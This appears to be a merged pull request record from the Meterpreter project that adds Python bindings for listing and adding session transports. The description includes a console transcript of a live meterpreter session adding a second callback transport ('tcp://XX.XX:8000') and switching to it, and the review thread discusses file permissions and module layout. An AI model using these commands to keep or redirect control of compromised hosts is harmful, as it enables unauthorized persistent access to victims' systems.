### PR TITLE
Transport python bindings

### PR DESCRIPTION
**Pull request by OJ**
This is in a similar vein to #46 (and builds on top of it, so that needs to land first) in that it adds more bindings. This time, for transports. Some changes had to be made to the way that the binding is called due to the fact that core commands are not considered extension commands. This PR contains code that by default assumes that all core commands exist. Don't mess this up! Bad things might happen.

```
meterpreter > python_execute 'import meterpreter.transport; print meterpreter.transport.list()'
[+] Content written to stdout:
{'SessionExpiry': datetime.datetime(2015, 11, 11, 14, 30, 58, 367000), 'Transports': [{'ProxyUser': None, 'CertHash': None, 'RetryWait': 10, 'URL': 'tcp://172.16.52.1:5005', 'CommTimeout': 300, 'UA': None, 'ProxyPass': None, 'RetryTotal': 3600, 'ProxyHost': None}]}

meterpreter > python_execute 'print meterpreter.transport.add("tcp://XX.XX:8000")'
[+] Content written to stdout:
True

meterpreter > python_execute 'print meterpreter.transport.list()'
[+] Content written to stdout:
{'SessionExpiry': datetime.datetime(2015, 11, 11, 14, 30, 58, 765000), 'Transports': [{'ProxyUser': None, 'CertHash': None, 'RetryWait': 10, 'URL': 'tcp://172.16.52.1:5005', 'CommTimeout': 300, 'UA': None, 'ProxyPass': None, 'RetryTotal': 3600, 'ProxyHost': None}, {'ProxyUser': None, 'CertHash': None, 'RetryWait': 10, 'URL': 'tcp://XX.XX:8000', 'CommTimeout': 300, 'UA': None, 'ProxyPass': None, 'RetryTotal': 3600, 'ProxyHost': None}]}

meterpreter > transport list
Session Expiry  : @ 2015-11-11 14:30:58

    ID  Curr  URL                     Comms T/O  Retry Total  Retry Wait
    --  ----  ---                     ---------  -----------  ----------
    1   *     tcp://172.16.52.1:5005  300        3600         10
    2         tcp://XX.XX:8000        300        3600         10

meterpreter > transport next
```
New bindings are:

* `meterpreter.transport.list` -- emulates the `transport list` command in `core`.
* `meterpreter.transport.add` -- emulates the `transport add` command in `core`.

The next PR that is coming will allow for python scripts to be embedded with the python extension and run on startup, allowing transports to be added as soon as the instance spins up.

## Verification

- [x] Create a meterp session with the built binaries
- [x] Test to make sure commands work as expected.

## Notes

To add HTTP/S transports you need a valid URI. I haven't ported the URI generation code to the Python libs because I think this isn't really a good move. Instead, we'd generate these URLs using MSF either on the command line or via  post module. Thoughts on this welcome.

### CODE REVIEW

File: c/meterpreter/source/extensions/incognito/hash_stealer.c [hunk 1]
```diff
@@ -48,26 +48,29 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
 	}
```
Comment (bcook-r7) [inline c/meterpreter/source/extensions/incognito/hash_stealer.c]: be careful, your system seems to continue making source files executable

File: c/meterpreter/source/extensions/python/Lib/meterpreter/tlv.py [hunk 2]
```diff
@@ -0,0 +1,59 @@
+from meterpreter.core import *
```
Comment (bcook-r7) [inline c/meterpreter/source/extensions/python/Lib/meterpreter/tlv.py]: I'm glad these moved into their own section

**Comment by bcook-r7** [comment]
Thanks, happy to merge these to keep the design and feedback cycle moving along. Now I just need an excuse to release the payloads gem update.

**Comment by OJ** [comment]
Thanks Brent! I will give you a reason soon with another PR that includes the stageless python init script "stuff".

Watch ze spacez!

**Pull request merged**